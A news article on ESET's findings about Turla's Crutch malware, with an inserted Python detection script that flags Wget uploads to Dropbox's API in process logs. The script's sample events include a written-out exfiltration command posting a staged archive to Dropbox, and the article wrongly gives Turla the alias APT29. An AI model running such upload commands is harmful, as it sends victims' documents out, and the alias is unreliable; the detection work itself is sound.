Researchers uncover Crutch malware used by state-backed Turla hacker group

Security researchers at ESET recently uncovered a "previously undocumented backdoor and document stealer" malware known as Crutch that was used between 2015 and early 2020 by Russian state-sponsored hacker group Turla.

According to the researchers, there is evidence of Turla operators using Crutch alongside Gazer, a second-stage backdoor, and FatDuke, a third-stage backdoor, on the same machine at the same time. Crutch and Gazer were used together in September 2017, and Crutch and FatDuke were also used at the same time on one machine, indicating that both backdoors were used by the same group.

The use of both Gazer and FatDuke has previously been attributed to Russian hacker group Turla, also known as APT29. According to ESET, the Turla hacker group used Crutch in an attack on the network of a Ministry of Foreign Affairs in a country of the European Union. The Crutch toolset was designed to exfiltrate sensitive documents and other files to Dropbox accounts controlled by Turla operators.

In January this year, the Austrian government's Foreign Ministry and its Interior Ministry announced in a joint statement that the State Department's IT systems were the target of a serious cyber attack that was carried out by a state actor.

"The State Department's IT systems are currently the target of a serious cyber attack. The problem was recognized very quickly and countermeasures were taken immediately. A coordination committee has been set up on the basis of the Network and Information System Security Act, and all relevant federal agencies are already active.

"Due to the severity and the nature of the attack, it cannot be ruled out that it is a targeted attack by a state actor. In the past, some European countries have been targeted for similar attacks. Despite all the intensive security measures, there is no 100% protection against cyber attacks. The state protection mechanisms provided for this are active at all levels," the joint statement read.

According to security firm Proofpoint, Turla was also responsible for the leak of personal information of hundreds of German politicians and public figures including Chancellor Angela Merkel on Twitter.

"While actor attribution is notoriously difficult, early indications suggest that the Russian APT group Turla (a.k.a. Snake, Venomous Bear, Waterbug, and Uroboros) is behind the German data breaches reported earlier today," said Chris Dawson, Threat Intelligence Lead at Proofpoint.

"Proofpoint researchers have seen Turla targeting German interests before, particularly leveraging a G20 summit on the Digital Economy that took place in Hamburg in October 2017; other activity associated with this group has been well-documented and stretches back to at least 2008," he added.

According to ESET researchers, Crutch is not a first-stage backdoor but is deployed by Turla operators on systems that have already been compromised. The Crutch version 3 architecture uses a backdoor communicating with a hardcoded Dropbox account using the official HTTP API. It persists via DLL hijacking on Chrome, Firefox or OneDrive and can execute basic commands such as reading and writing files or executing additional processes.

Within this architecture, the backdoor also communicates with a removable-drive monitor that has no network capabilities. The removable-drive monitor searches for files that have an interesting extension (.pdf, .rtf, .doc, .docx) and then stages the files in an encrypted archive.

The latest version of the malware (Crutch version 4), which was discovered in July 2019 by ESET, is an updated version of the removable-drive monitor with networking capabilities. Crutch v4 no longer supports backdoor commands but can automatically upload the files found on local and removable drives to Dropbox storage by using the Windows version of the Wget utility.
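
The Crutch v4 behaviour described above, Wget for Windows pushing files to Dropbox, can be hunted for in process-creation logs; the following Python example is an addition to this article, not code from ESET or from the malware. It assumes events with hypothetical `image` and `command_line` fields and runs over constructed sample command lines; only the Wget option names and the Dropbox API host names are real.

```python
import re
from pathlib import PureWindowsPath

# Public Dropbox HTTP API hosts; ordinary browsing uses www.dropbox.com instead.
DROPBOX_API_HOSTS = {"api.dropboxapi.com", "content.dropboxapi.com"}
URL_HOST = re.compile(r"https?://([^/\s:\"']+)", re.I)
# GNU Wget options that attach a local file as the request body.
BODY_FILE = re.compile(r'--(?:post|body)-file[=\s]+(?:"([^"]+)"|(\S+))', re.I)


def triage(event):
    """Return a finding dict for one process-creation event, or None."""
    cmd = event["command_line"]
    hosts = {h.lower() for h in URL_HOST.findall(cmd)} & DROPBOX_API_HOSTS
    if not hosts:
        return None
    m = BODY_FILE.search(cmd)
    image = PureWindowsPath(event["image"]).name.lower()
    # Keyed on the upload option, not the file name, so a renamed wget still
    # hits; an API host without an upload option is reported at lower severity.
    return {"severity": "high" if m else "medium", "image": image,
            "host": sorted(hosts)[0],
            "uploaded_file": (m.group(1) or m.group(2)) if m else None}


# Constructed sample events (hypothetical, not taken from the ESET report).
EVENTS = [
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": r'"chrome.exe" https://www.dropbox.com/home'},
    {"image": r"C:\Tools\wget.exe",
     "command_line": r"wget.exe https://ftp.gnu.org/gnu/wget/wget-1.21.tar.gz"},
    {"image": r"C:\Users\Public\wget.exe",
     "command_line": r'wget.exe --header="Authorization: Bearer <REDACTED>" '
                     r'--post-file="C:\Users\Public\stage\docs.rar" '
                     r"https://content.dropboxapi.com/2/files/upload"},
    {"image": r"C:\ProgramData\svc.exe",
     "command_line": r"svc.exe --body-file=C:\ProgramData\a.bin "
                     r"https://content.dropboxapi.com/2/files/upload"},
]


def scan(events):
    """Return (index, finding) pairs for every flagged event."""
    return [(i, f) for i, e in enumerate(events) if (f := triage(e))]


if __name__ == "__main__":
    for idx, finding in scan(EVENTS):
        print(idx, finding)
```

Hosts where the Dropbox desktop client or sanctioned backup scripts run will need an allowlist in front of this check.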

"In the past few years, we have publicly documented multiple malware families operated by Turla. Crutch shows that the group is not short of new or currently undocumented backdoors. This discovery further strengthens the perception that the Turla group has considerable resources to operate such a large and diverse arsenal.

"Crutch is able to bypass some security layers by abusing legitimate infrastructure – here Dropbox – in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators," the researchers said.

Copyright Lyonsdown Limited 2020